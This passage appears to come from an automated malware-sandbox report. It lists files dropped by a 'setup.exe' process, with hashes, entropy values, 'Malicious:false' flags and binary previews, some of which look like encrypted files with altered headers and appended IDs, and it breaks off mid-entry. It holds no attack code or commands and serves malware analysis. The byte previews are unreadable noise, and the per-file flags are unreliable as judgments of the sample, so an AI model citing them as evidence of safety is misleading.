              SHA-512:34B44D9C2AC121FB7F5D7A11653DA0718D148853238122DAD6A3EAF6C8C0E2860EFBB01B68A04201B72E832F6AC85A3C6B415B9471CD3CB440E9A5277573ACD4
              Malicious:false
              Preview:EBFGO........7......%.@...$&0......-.<^.K..&..).x....6..^z.>.VmA......,.Bi....*TcO..a...h.;...T..g..C.f...5#.M..$.9..o%.~..~a...h.T.Bj.y.....P.M.k..Q.P.a.}....y.3.....E8.t).l..<. .<Lg..3.Q.....%17.X.!.M.S..).$b....-LBZ.)*.^.....7o.Q)`j.g.Io...q>iH....e.......a..`.57.t.k...s....E..+c.....[.......44..../.[..Q,.)Z..&...$.\{.C..4.. i.}...#6SH..^y.l..,aufw........I..,.j.W:....Jhu...3......\...J.'...7?......>u..5(7...e..i.2C.uG.Z...f...."&...E.J{.W.......>.u.-y....l....Y....,.[4..A..*.1..;..$.PM..._.;.t.f7.dv..............mT..8......5.....`..E.J......Z.i...Q.:.....EdS.!C~.vl.{.6j..(M...4wx...M.:..Vj3...8.yA9x..r..S.f..U9.... .&.C.t.....z}]#nDj....P.+.L/..A.0.q........z.$.......A.w.I.[.......U...j.|...:..2.\.U.....S.....?_.t1..7.8......_q..J...... .>3j;.=`+..JnVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}........................................................................................................................
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):3.458150632339323
              Encrypted:false
              SSDEEP:768:4kWC9KDJcXMc/G+g+5QTG87EKLsJ8B2u5Kjmb:t9KdcXMc/G+d2THEKw8kugS
              MD5:192066FFE552E1C1ECABC378D5B49A3A
              SHA1:87CAC07074651BAFA51E02E88EE9894FDEDE459E
              SHA-256:6FD8DF7EBD9991AEA798B7611DD8EFC58A91C6DB90BC9662615AEA3B32B71495
              SHA-512:C40A175080AFC1472FC866D6572A7BA5E8C162767D4E9250F0BBB01B20C8B51D87F7BC8D0ED58C86E9C437891D1B7C75E760E4AA8643C7BA501A718FAB03916E
              Malicious:false
              Preview:1.0./.=C5W.fy_'..{.=.....;..T_M.;S.<=....ZB.k*....4A....$........L.k....G"./.3gaF.....Pb1........a...<z...|..W.5.D...'g.o.R..FM-;.e.oF.<...j.P&.O ~OC...,..u.4..}U..s._w.`...+ u....2.v...... E.W5.Q.+.........y(u..Lb..4%9.z....5Q .Zx.t....s.Y...Ep.jA..l..4....%.../......K|"....gX.N.7(...X.+Q8....5..u.GZXg8XYp...LIdv%...>.M.<Gu...ML.K.....i.vex...Re .u$.z.E..q..z..k...(...T...O1s.$..~*.V...M%.o....R6.Y.x.i.k....MC..^%.F._jt.Wo.5.OQ.y.o8..O....m.....>j.#8..P"......c...O..w+U....r..1Yl.W^*..3D8.`....GX|'.,......;u[..u..0...h.9_...Y..j .4UN...h...6..0J.].?....G.z....C9.@..........#!A#.'.V......B!f.b....a...~W%fp..%..zA....i+.....D..>.\Z.=.e.{..q.;{...(.}...X:.....zxf.B....3..)E.p}.y.....o.1 ..p.Qt...O.Lk..FI;.....Q...m..)..i....y.L."...o...Kp......H.m...Ow+....*]...i.....j...........I.y.]...bG@..4...Y7.wYG.|...|p.M..EmsO...gD..5......X..t.9...P.#(.W.]e.#..g|.B..`[..r(R...,.mY4..u...a.......W....k.0.K...H2Pd.cJ....^...}..?0.....w9..x.z.]T#.s...:..<A&.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.939534158579068
              Encrypted:false
              SSDEEP:96:U47Sw/v3ZISNaDg0nGzQoZCj7fk01MxJgcC7NwVKQc3oZ:U4Z/xJcpnGzQokU0mb7CabS
              MD5:02726FF0E93527EDCEC18E64DECA3D3C
              SHA1:2A84AA4219A86390D2053A8D4ED24A565564D248
              SHA-256:B29ED246DC1C76BFB74DFF790B1377026BB75A4CA3DFCDBE2BC464076D6FCB7F
              SHA-512:3EB6AC4B82B6437AB59DD7081A7D31DB7613C4B46448305351287953A51DA7FFD44BA4EF994987DDF9EA961024BAC0836BDBCEA1986EDD2F942B7EE5CCDC0ABD
              Malicious:false
              Preview:EBFGO.9.c..zV.<@..SR...nH.o...?9...>...T...T.M..Nh....X:#A..H|..2...3N......l........7..*)..\&..W."..>.x...f..mW..[3....[X.}.....-2....!.......b\.7P...A.3....."'9{....i O/.,.z..2.vZ.,R`>.H;.~n.....sl.Z...y.k.t.F...u..H..V...v.*;8..W..WI.K....J............]'..V&.......w:pX|....>....>w..%.o.......N......|. .ni ..3......i.T(@{..wj..}...2.a....A...PR\p.=A..t......B/..g=...[...@.....Zf...j....#...E.eF]T.Jiay...M/../..Z..]I...#.c...8t...!i..l.:..A..2..h..=.U.N...AN..q...S....b.{.SF.CU...Z.D=...T.5!D..%Y+...L."........\.;.x.....O.J..48.gH...p.T_....)..s...y.K.>n"E..g.&.*..{.U...N..^h.).q...]..#......}....Lg............AP!...?.n|6. ..G.x......m.Q.D...g'.~J.P.`..E....M.6.m.......p.Sf..9(EU.E...p..s........$..U...R1...~N...e......4..j}..dTx.H..F .V6r.H...M..Ha8."E.w..3.5^.D^H.....]i=C......^ n.9....#.#W..cK..S/..R.x;m....K.z%}.s....I.....oM%...(...x.R..Wc.$..P|....F).....2.9...%Q..P.^N.*.*.%"o.6}....Xy30...g.ih}...Ht....]..S5J&b.7...l...f.;.M)@
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.20584814155791922
              Encrypted:false
              SSDEEP:24:jneuI18aqsF1BCiPinS9491ZplabQf/gyKbz:04sLwiP+abQKz
              MD5:B968833BFABE3356A841CDB765907D78
              SHA1:7D44E423175CDBACA16EB4DC81B2B17A600E0BF9
              SHA-256:1F97441810C2885CC6C94828788DB41BD726F5890DE7799B09B7F368CD902F69
              SHA-512:BC16A3379419229B7EDA775799A3C7F14F8DD2339FACCEF4FDF0AFF6745352DE1CF703C0625C3CC66A92CA65641BD088FF22E664CD7DB798BF6B9A4519DE3364
              Malicious:false
              Preview:EBFGO..Iq.K gm. .D..g..&(.g.........'o..b{.X.p...&.?Nd.......@;\ju..R.6.".D....j!......g. ....5._....)...s..l...F....0....;T/%...#...Q..~e..J]?JJX.....O..........p5...i....x........./m9c..6.....iR..(z......j.V..#..#Tq.J....Que....j.mr4$...Nwb...../u'ML.x....Do.N.. 7..S.7.dW.%g.].......#.Fn...?.R...F......8Ksd...K;..]2.X;k.X.A-Q.......9.!|..@[.......d.......0M.J...;/...T..;.>p......i..M..n.>.....?...L.........8v......qE.J.| c@.L..x!..%ci.....LEr.7u...Y..5..e.K...a..'...J...g....q.....H?GRV......s .L,........n....<#..{...,O......v.7ckoF...5..f..&.h...c.?....b..y...`...^.|.V}........vT.?]7.@M.....-.,.s.../.j).e..D.r5."NmB..SA.......5.J...>..)..-..`.n`.8........B.....__...F...5\A8......2c.....[.y.-..Mqt...1.t..&..[..s....(.P.....#.t<d.H.....9O......5..K.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}........................................................................................................................
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):3.897514621070644
              Encrypted:false
              SSDEEP:384:5uqgIsNYccIT1tuRRGcvV9vtMFf4LUXz017+ao62dzIeyZu0SwdsxDSd6aPQoQNY:0jNtqpV9uJ4L/3H6z+Zu0SikO90wT
              MD5:56EE4170546F66AAECA39A92CF035D77
              SHA1:B5473255F48F363C92C55D92E6EE3833FBBA6DB6
              SHA-256:795D3C347BEF8857126D734B3800289000394070443E88EA0857FE0CA41BD9E0
              SHA-512:F63506158ED901742C8DCFFECB0EB399CC7C9D334BC171869B22A044C2BBFEB1D04954EDB602AE918E41D199ADBB7494AE578A5690DCA63C61CE8E7A225C9CB2
              Malicious:false
              Preview:1.0./.y..O.ht..{*..0..wp.......d....g.jC./..V...,...Y.I..@..M/.q..1.h...|2.m.9U.. l..Sj.t.&...V.E.......A..yO.............9.E.|..|...EI.;...R.1.."Wf.My.5CQ.........Y.@)....L............."8U...%..(.f............%.......#=..4.....Z...e......$..........G....!.R....!...3._c,j.Rs...o......q..$2d3tX.K...."{..,...\.O<.fq.b...=....5.....jswem.........6.Ly.t.h..u...X...h6.4..H..]..b.....5...O..f.......h.K.. ...d*.D.e..._;.R.\.w+H....q. +w..h.H...s(C.juj.v'.....)p...iq...... yq.?.;.@....GQ$....P....Ige...A".2....`..i...Ch.f......".....S[.)..u^...S..~'e..L.F3.\s.>M.h.Q:3...}H.....d......n......q&...Lc....\E.^.^..N.pb..q.j.+.1./NdwoV....,g..7.....hw.W..5.LSH.%.).v..G...v_.$.2)..4.z._.iI~....D...:.....V`..4ia.g.*.!r..6.e..wd.!2g6...>....(..f...<......F....tI9.6..1..4C.R.w...Q...m..|S.V.......E ..r...)..xG.Dt......../...w..W,T....3n..r.i...j...x.i..a.ZS.me....3S..]....1.....p...79........................'..&.'Z\.K...h......*...6&&.T.8...*dNM.b&....F.._e.c
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):4.416419994753862
              Encrypted:false
              SSDEEP:768:ioSonCPxkCuA1m08BYnuNBN7dDOkIzkyLsxUasym0vs3YxOIg:i6n6IAm08sut5n6kes+vyPhx0
              MD5:D737509FEDA33FE0D9475A520AB10C02
              SHA1:BEA1C7EC67403C56EFFF3C226B479B82B0185E43
              SHA-256:22E8D230F83FAB09C02708CC224061BBAD7425CECD9417F1D8C790419CD147FE
              SHA-512:0C696AD1AADD80965B002E2705E1F6A6318E09FBF679A569A9F51B83876F36765FB1D55E462EAE55D99F20B04EC753DC6E0E851C989CCB1E492E238BEB53A3E2
              Malicious:false
              Preview:1.0./4..v.]..e...d...*..m8.....t...~.......{..P..O....L.T.=.7........,.}o....TN....i..!v.(.u....u.O.t.B6m..[.g...}....L..~M.&.o.(.(.a.C.K.l.....m...l)..}..G..F....Q...usZ.s.....`........o#Ah..<V.+u.^..x.i.%..,M..3.(.e.<..:s.t....b[....^oz.[...v..E..I.| +L!.(v.....W...g..PY..~?.Ga...q.9&.m3..%[..y.7...-oZ0....N...<B,...5..n.#....<v$.1Wg....|.b.6..Q.R...e+..DrEX,].~.(|....a...7......"....0.j..P.'.I.~R.D.@.j.%.../.................a..1.M.Z fn.H(..c...7.kf.x.....+...1.y9[....l.k7a.l..F...c.... y..F.{...|b.Q.}L.5....V..>%..J.M.@.............y'..R.2.#N...b..n.D:m.......<.;`.H.#.x....j6U$!.<".^d.Cv..VS...DJ+.XO.O.3N......,g.....!#....mZ.'3L.<(.".....jv....[.NM..P[U".V..wh.....\..;..*;....T+.#.v......3......(7....iW.{kJ....=lt....]..~ ..Ym.A..{.<..Au...Y........z..?.L.....+.....V....1J....~;6.DE#....!4.Ex...lRfY..S5...x.{|].:..!...W.@<..g.B.....R.Wp.wd..\.........i.H...W.P..*....l..1.........?A^/.........x.. F...`.w.w.].O|.....5.=sE..>1.>%#.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):4.555665242479898
              Encrypted:false
              SSDEEP:768:IcCQPgymlI+CakqT0pHsqdQprtRJcjDCbl7:IFHPlIpS0barCO
              MD5:72051593844DCBDF81E22AA472792D3C
              SHA1:A069940C5F40D95426D6E7CD33B7F8B81252E560
              SHA-256:BD8BCC14B95E2CA0D6F16509FC1E2FEF6387DBCE93913C1A742C86DE9D4038C5
              SHA-512:0FEBDE6422E94E5342EB80BC9EED410876EF0D538B92F7D47F0445C7CE08043A6D2E3BFF2388B547D26C316B24E624837F6EFD2B5948E3AE8CA2ACA11055815E
              Malicious:false
              Preview:1.0./..).@.'|..K.<p-.j..s....H..}.q.L.^.u..n..yi..].5yV{...!.:`e.....j;~...:....+G5.G.Pj..FR...'....3.....W}.%i.g..=@=.....a/....'NB.p#..v.~..`c./J.....&.#....g.a..kc..h.....*...Q:.Q.V.{*Y.....k.OWoqo.0$.i.......@...R*.....Z.md.7..j)....[+..oBk...#.=..l...;...a......U ......._..LM....6.>^D.hY.a..].dli..S....../o...K.Y....uf7..X..-<.+..m.Fo.9....#R&..b.l..m..;. ....5..P2.P...M.....Mo.^...m|rD...|.>k...WgD..W6I..'GP......H..*.w...-.:/.rYx....[m`......../,..".$lt\.`.o..{.[]n..B...._....5e......G.....q.Ll$............R.3...9..R".w..7..~.t..f...I.......T.3.V.Y.=e.z.$...B..>y.i.fO8~.X.Eu..._.Q.;X.....F..;...?.1H.../..v.V.$.{...(.[.}..>.6.~...p........~..TDw...a....Q...S~'A..7.....S..@..,...q.Q..z.4B\....O....#."...n....Q...*...P...`.`.Ds.L...K....u...pO._...>.s4o...s;......C|U.\e....{.w..c&.l.=..mD.]_...'..,.M.....w.I@....7P.D.....}3..z.Ul.@q.."".....wf..G..}.i~..&".K6.ib......!....0w...9.l(..s...U...sY.:......L......@......pUE.......g
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):1.3143716784739476
              Encrypted:false
              SSDEEP:192:pQ1OAcqiKSEPyRHqfez+PYsK1SZmzYS7TsSeF:K1CRkPyRKfez4YpSZaD7oSe
              MD5:816151F6BEE706EC982344B552164EC4
              SHA1:03D6190DC080687E26E80EA3C439056692A03613
              SHA-256:D849F3E5A843C42061CF33A43AD48A9FFBEC4A81088BDB29D0AAD411D901086C
              SHA-512:190F890229683022459E622A10F7B8D8C5574BADF992D5119F5ED9D02881540401D9B90CABDCAC694E90D69D792B592565BABAF2A7841F6CAC50B90E8A31DAF7
              Malicious:false
              Preview:1.0./i....au..."....I......;x.?j..#...N...,....v...c.IY..(7..:'..=......hB.]..E..{.~.S.b..T...c.C..q..k.L...4.nnN...]J.?.......nH........Cg=..G....dG(...@|.q.5.>J.$.K.YkR..iho!...K.q`.F.u.=4Q..b.8.Riz..pr.-..b.+......+>[.....C...;...$:B.vha.p.Ek. ,<Pv.y..l..s1}?b.T.#...46.z...Z.iW..h.A[..............(..d...6.......hP......".BKy..JQI..:...B. .I...25....k...|.....E..Hy....3qhW........Ad..Z.IB.@..M..[...Y..0..n...p.Q...........|.u...l.......4..n.%.&@.3Pp.o......G.@.....P#z.}.'Q......@zd.D..k.H.........{...sg}E....L%.qL#...V0.`.5..K.E.zX8.J.u.O.].,FJj.\9..s......n[i.......`.'mU.,.eq...0...?.a..R].T.2Pw....xL6....1k#F7!........P~..9._..2.!.X.(.3..O.AZ....z...^W..f(s.8..<A.8.).4./.......'.....p. .V.,.r@y-.7_..Wk='3g"G..~.......xy..d{.\yo...........@n.V.......BfK....S.,q.....A...o]k..1..Y.p..B.9........ RE.....w..i4.l....<K.8GU...gy..fVO.`...x.)....P...#(.LsuDr....pX...B~a.~. ...c...........T..2~)..n-....\.....lb....d..X=j."=x.]..s.@2..pM..)...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):2.7597772132040173
              Encrypted:false
              SSDEEP:384:lwYwCoZ9k2h/zq03FbjM+whe9SY3aMQ7ktq31iAWRYEH0+NJyFmD:KsoZaWzv2+UeUJZk0o1l0W2m
              MD5:B721396406D1A363BD30D20647A0F5BF
              SHA1:CF1642E28BEE95F13425372B24E06C3DC7D3690A
              SHA-256:7FB8F1F1092D4676E391A9908E4D89364C3A3747908F5F0247BF30EDE1794A0E
              SHA-512:A2BE92F55BD11491B4693A5A3F9B36F978AB90B5D28511BAA68E86D066136E3C251480BDACE24295F44DE5B95014D8F395CC17779E4A12E6F2B4406DC742EF56
              Malicious:false
              Preview:1.0./.7.mq..r.5X.*H...E4.....46f.P.Md.zs.O6@....n,.C......^.\Vk..R=x.B...C.Ug..I....<....6..!y.klY}!.oi..t[q.r.m..+.[.p.&`-.<...+^../+..l.4.Ti..6.5.N.Ns.K}c..[...'.....]..<ry"@..].#.....^..r...>o[.H.m..........2..D?...XDy]U..._.|.$.....U.T>).nJl.b....O....])..%.cC=2J....y#...O.._.R.....O...m.2.w1.I.~.o...R.R%G..61....O:.l.(...0S......T..%.g.....P.ztVYy(.b7B..[O_...|.9Y$...:..b..a..L.cf..&....6.{8K./[.ID.M..U/.....1..(..g.3o..YP.j.5A...m7.R.M..%A.+$...............%....(. =.@._.P.'x....v.Wzp.P..6..\7\..td.QC.. ..Z.t.o....q......Qo..m..t..1.....g....5....)5...o....F..(*.n..............D#!.@n..^.Y...g.JO..0+2..Y*7..S.....0N.F$}.......D.ZlV.H..5............7rS..M.,=W.<...9.p....\....z..h..S.$.5..g{$..SM..3.....6....E.._..5Ax.V....3...e.T.=....4fz...u..k]2.R.."v.P63.[...^.......a..k...{a8@j....Cqn...X.....3..by.D5.w.`..+......cN.C...{...\...N.....m..vX.@......Xh.Hk.....T.g.x.t...9...7...6.%.....I.....<;..}.K.o..M..`.......-.6Z.4.......V..,Xz.o_..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):1.00437979914996
              Encrypted:false
              SSDEEP:96:hD+P2k0KAe+hAHmFvJbkHC4KyWbyKt1kMdDhf8fZ4NAb+mY:hD+P8e+hAGFhbkUyvKt1/hfk4NAam
              MD5:A115BA05074BE2603668B487270B1489
              SHA1:0B59297758B6EDF5BC5423022C2834FECFD9510E
              SHA-256:BE170D6EE00663FE269D5F837D23E1EBF865397B51435B4ECD71C2FD61ACCCE4
              SHA-512:EBE9AC609302023B76ED2949C34244D63150F6712440F59F2165B428DF4B7CE0B793B2B9256911398DA5CAF1E2614A851D67D08B930203E1020C4D6248594559
              Malicious:false
              Preview:1.0./".w|.`..&.G..]u.+...X....PZ.I.=..o,MO...'....<.. .S..4.B..M.m@`./8.c(..~i.+r...@#...(.\....zYH...}9.\kY..........%...?!K.Jlm...v..Hr.........)a.]...T.?.W...I[._...Z.A..2.[.u....).<.L........jR.Mp*6o.Z@........a%4..Gy..$.#..Iv..P.%4..Z.|.6..r<...-b;.}.1..h.u..q.......~e@....-t........^..(a~.....".OA9...!E=.w1.4..m...e+).M..Yw.1.V.6a...D.I.Y4~.. .}.B.S.4.. .._gt.....=..=y@...$.N..p.F.e0.....v.D.........<..0.+.n._s.Y..R.a...........Q....:..X..+..'....x.[...K..".}#.E.Oq...~....c..._t......Mp.@*.ODXw...4....c....".!c..:..D.U...=..%Q..5 .<~Z...r...-N....|...T.'._..[.O.+.....`.U=s"..!.......y.Q.Sf6jvE..VU..[# ..J..2G..M.V.e....T...f.:.).".B....C..O.....qs..h.U&..R`.kZ.....D.wJ......}t<..'...P..[...4{.... ....T.......?.j\.Y9!..r...GWR..o......BQ..u_..q..X..=..J$..N.z......}o...|8......z.?....v".z@5........Q....ti&....Y.....r..r.a9..l..ib.7...Z.8..z...../h.....EU...V..'.U...Z...3w..uU~..#..Q...2.......u.*..qs....2U.X!H..Ml.X..G.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):1.0041957743164236
              Encrypted:false
              SSDEEP:96:XnvEWL8CUb7yh4nMypR5qD9ZgZvv5nxmvOdCiy7GF6hjk7Y9HfsSYEXxz3JwQz:XXrUHe4nMqfqzgZxccIjpf1V3qQ
              MD5:4C6FB571223F214496E3A32D618589A4
              SHA1:248DA9CED68B556464FB655D4ABA13B0ADA61269
              SHA-256:2780894CDB4EB8AED05B28F544627AE7F9459BB63D15B0F50CD1880EEFE93C3A
              SHA-512:B443F483C6B69ABBE25B9D96EDB02141091AC489929E9C16307F1599D9F8BC5CEA70BB77BC97CA41E4D3B2B3C1768679C7FD2090482A2AC02ECF63F42DB8BBBA
              Malicious:false
              Preview:1.0./....T_G..':.>)...|K=....,.EDH{Q..;.#........{N.-uL1o......'.~Q..\..n*..{.f.o7.hK~.7..S...R.n`P|ZO.qa.+.l....$..5U....Q.V...V....#4..S.I3...0V..[...{....?%.O._...../....:.-.K..2.....!(Q....G..c.j...R_.9.....nXBI...~...N5.&w#..-Qk....D..;..S@..w.i&P.\f2.>Z...G...E.:.g..4.6df..t.6&......4..`e.......U..}f.x.=e..4..8.32._{.G...B...Q...E.PU/q.8..s............t...........60.....;..ik-.......Z..2P.v8...i.........O....7..:.O:..s.....x.A.,o.R.I.8d.6..F.3....!.p#(...q..t...N%k.[.....~.....*z.......M....u'h.I2.`..c?Vt.Q}...O......3I..i-......3B0.......Eh.j.....m.q7Y......._.d.........g.#|K.....C...)Qn`.7..(.P.39......*^.h..t...\x..U...x.q..+..*.........~.o.t......AP......-BY{Sr|gBjn2Uf..H.s.nx&iBtQ).ck..~..F,...B..ms7&c!r..T....K..++m@...`\xVr.B2 ...cK..$..Mks........R....0.Frt.....?'...s`....AG!.._.....N...M.Tw7J^.Hn}.$.CD-.....U.7`N.#>......."..8....b{.t...],'..t.3...[...f..[9.&.wK......c.0....&t.3.Wx./_=?nG..7.Z...S...".i.'{B.q.#...G_..=.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):3.4255175713194133
              Encrypted:false
              SSDEEP:384:ZZgxMSuA02XIHgx16FxJoLz0+P//d0kUOr0vo7mPmKQJnVg3KJ:MhPXYy16FxJoLz04/dLMoKPmKil
              MD5:EE03B3D19E47E5A9F42584047897A19E
              SHA1:3AF786520C55E17DDA8BBDDD4123262F09EC2147
              SHA-256:BAE103074CD76B5F793DCD7BA48C57C21A762B05FB1927C485E56BC959175F8B
              SHA-512:1D57118B20A0CC1092E6AF4F8ECBC499B2ACBFD12BA48345B27E024DB70AD61B277206A77D31C4E05A89DAFA89ECDA899B3BFAB4CDF73E35C52A8484C994B4AA
              Malicious:false
              Preview:SQLitc{..... .I|.m.{...j.4.`..U&..N.....<f.^..2.;|.GS.{.._[|r..>..v..2..R.Q.}<4....U.K...o.i..,.g..'=%.!... .~\..P:......ez<....0.8.+:.....tJd..(s.g.>.Y........dc.9.U.4......j).M......_.-R...z...O.?.O..k_......,...b.........TE...>'a.O..U=.....v-s.v....1...^H.7.M.E...i...K.kgr.<g.514...t2?t..t*...8x..v....O.%...>.u...-...a|.....~F55..Q..8.!.|`h......-.d..'.S.y.....8I..pdT..)L(&4...=:L(..Y.c..Wu..VU.-uy.....J.. H._.}.4U..4].T..^..0...4...w...pN ...G.0....1...H..U.7y....E....KP..@.....2.`.].P.Y.R_;5...w...Jh.#..).1.....9.....>.;N...8#.j.k...O....>,.l;.....W.A.P...B$..Pu.?.*f......OyY.A.`.R.T..T...#.....Y...n..._CA....f..qi./.q...<w.....V.r.=Y..&..5....t7.r..e.&.GR.1q.KX.].......i..q....U..:..:..>*....a..}./...#...0...(.7 g..=XC,.....<...t'....`.J.:...7r/$.@...'.#S%...r..1n.7...cHi..o..*.$...A.aq..A.......S.CnV0&..q=..n.{f...p... ..F._..a.k.=*...vRJ.[...m...H..J......<.c.......Y.3e.<..C.....yi..2.p4.ad.0B../C{....=If.t....{-B6Y$,............<}w
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):3.428264786306048
              Encrypted:false
              SSDEEP:768:2E3qC3cG7nMYxE48NwVtOw7OqE5NH7lY:2E3qCF7ni48Nktt6qu57lY
              MD5:63C8A07FC0E7F896843410283E9E925A
              SHA1:57494BB3F0C6CED291523322B822FE09A7EA1E7E
              SHA-256:2DE361C4F9345B16964E013708448F54C5625558F8181C59F2DD047AE4C22EBE
              SHA-512:9264480A5643A89AED17A10AECAE64C184E0253CE13F06B12EDAD29E2C2F7E7453183702590721629F3869C843E709294BDA017436DA43949CCC8B222C66EB80
              Malicious:false
              Preview:SQLit..C.....7.V..T...$.t....h.........q..B.....80...y.S........m....7E..(W.k.6...C[.....1...=.Y..K....R.?.l.e O.....!.7.P2.~.VJ.+r.h'..S.$9..4.").T..uR...2..N....[....C..N.Do..c.% .7fku..5...F#.X2S...{,...P......Q.a.X..4Q...F........ix.D.r...H..S.......H....U...b~./.....%..k.e....^.{E7. ".f5......~.xc....*.+'.]F....O=<....'.0...CB9..a.I..(...D.........O8..%'..9...n.a.9..=.UM.s..X.....K.....N..br.8Hx4.k...1.e-...Y.O.s....K..pw....c.8y.."..f...?.].....A.O.a........-.....d.&mK..Q.G".,p*l....ZM....^..g..G..!Y..f.pn.>.q,.is.QN.Y...T...t.......,r..M.j..#._..]Q.P.f..<.j.....e.92..szb.....T....P...T&.1..&t.._.z.............9.a.`X.....5..|..hX......Y.2&....&K..1...r.V..a?S)0MJ.E.V.Z..`c.F.....U..). g.CU....."...4t.!.7.....c.....V...G.....4.>j..:...2e..p.d...1....P.*..fN4..tP@.gf..-..>k....`p..3%m0D.M.q..k..p.r.V....o..u...r...o.k..h".&.j+-..\...+7.I..MVl.}=..#vw.g..z..\K".p|..I[..[....k.ymS.j..dIq.y..y:.+E.Qm.x/!..?.F.9..:....xS?.d.`..V..X.n...`.2.\....Y
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):3.426291062042414
              Encrypted:false
              SSDEEP:384:S3lIysbyXyhXvQSJg8L/duKzR4T0WTjUk6OIbblXMqV3qP76nl7GFAxxByoH:YlIXjDLLluKzR4TpTIk6PXyW9zB
              MD5:0E2580C9F26DCC4552257D87F81906A8
              SHA1:A8940E1AA0C48558DBC0FE8592CF385275FA6125
              SHA-256:8A32B5927BBD35A6376EF009F09413133A039CD0EBD0156FA70A75E3422B259A
              SHA-512:0C09CA0B7F1F6CD4DC821E3F1B8E9B375B61E2B45C771B73C113270631556B6BEB769188D39F5184BED641302D8EAACF82A101E989F8A91123F2FC57B0932B90
              Malicious:false
              Preview:SQLitv.......6.[../]...eR..-. ....t\t-......N2..\n....9L-..V_.[.8...,......."...dT.Wi...3W..)......]j.O~...#..c.P.c.y....maO..]..rj.......E}l5s..Ih8.%.Q...I.ScOp......(.=.i.....P.x.Rb.Q...e....3N8F......|......<5...,2.I..4X......V......8..=..5...RH.z..P...{..k.u...>&UOa.I..Jc.\..z....:....M/.:Q...d..x../.L...(0..k0.9..S...h..`C.{q.....MH..g...D.#5G..!....4.d...H6{.*...}...\Q...6uv..2e[.C...P.:.........L...^.L.....1],."...G..&.#.?..3..O.{i.h......$..$!...>...H.&....'fu.......6eg^3...C.`G........E...oZL...x....O.E...w:........o..0.s.....n..a..i.w/A>.M.\...h...%.../9..n..JnC....:w.S`.3..G..........K.N.]./k.J.s........lWq5[.......T...8.b.e...}^e7....X..&..-O..FqZ........n...9..nB..2x9?y.....t.T[7...z...`..[.}].<....d...../..n.......T..k.,A..0!.p..o...8..2.j..Z,.".}...g@.).......w.JB.-j....d.on_.m..8.|.?..3.....[...w.:..]..f.y....{......n.r. ......+rz,@b.r....... ...'.!_KP../:..a.r~.h1kQF.m...|.l.H..{%.......,.._{X$..P.B.>e..\..@..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2612
              Entropy (8bit):7.92189275653537
              Encrypted:false
              SSDEEP:48:KIFy/WE4p96xqeqUippT4Vmx0+f/wyqTz0RgMdOyV9x/KE+JFDD:jBEu6MBFuA0+f/wjTzk/vUEWP
              MD5:E760B269B56E7B20850CDCA09B8E42CA
              SHA1:F0EF7E3B5CFC1C2D6FDF67F3B571D0AFBFB8A1BE
              SHA-256:6E1F019E66D8E024B2ED21537A72DFC2E8542F2A570C6AB02ADC228DCF78552D
              SHA-512:52813D25D06F712931C21BC5BF4D74F7C41367E51141C10C40C2ABFDED4DC1B6E0A3DCC95D3CF7B63D7CFBA573D6F99A057246FABD483EF320C44F2BB4E1216B
              Malicious:false
              Preview:{.".T6ftV.j.......a5.4...[~P........`.'5...bd..<...i8..ljE..u..\..r..@./m3n....h....a..Y.z2...Z.CU/...{8....$.D..........&.Bi..m(.3..q.9C.h..F..(.>0c+...'....SQ5:..D]x.c.;.>1).c......m..ps..R(.{.....G.\..-|-B..?.o.K2...V.=..5.B.}.q....]....i.,.NSD...?r........'.Y...|..v..@.r..}...}-........:...i...i.d.HXw=1...95Y|..n.b.c.E,./.`.F.*P...A.fA.64..C..e..e....O.VRd.W..FN.?M.9...7.PP...r._.......r.O..?...xV.....P-K...U.lZ....". ..$.y...^..{.n.p.@V.,...1.`....#.h...".]...Q....]......)7.#.#..G.\...<.k.sJ.H.m...v....>.#...:G>4Q..mW..k....7..[....d.^..k..:...,."P.K"......?(M.X.\.k./:.9....$g{....E.eX.E._......Nf..?V.0.b!3R....m.(1gI%...mb.n.[&.J.gFz4.N.-..B.A..v..zaE....^"..G.@<.#.....Rf.C<....o...~..G.f.p..G...1.....^..=...=.~.b.64.....5.?...V......(a/E..T..,:.d....9!aT<.s.2.....,nM....Y*..O...r...\\Ap...w.V{K.wgN...a;;^54.z....u..:..)......(A..2KC..T8.*.(...%..d+...o........v.X .U.\._./.4.{.z....k.7.1...Z.g{....~H.xV...6.NK|`sc..<0........
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2612
              Entropy (8bit):7.930093369882589
              Encrypted:false
              SSDEEP:48:VB3HXyjxhi7KavV+8tWFvkGb0t6jWt2ss9/Tc+ALvOjsXK1Pb8ZetRqIRTJMeD:VR8wV+gWFvkU0t0Wvsh67bX105x
              MD5:A637F44B5D49E71F331F4FF6E68B94DE
              SHA1:73B289EE0DCA9F06EAEF50C61783AEA422C1B188
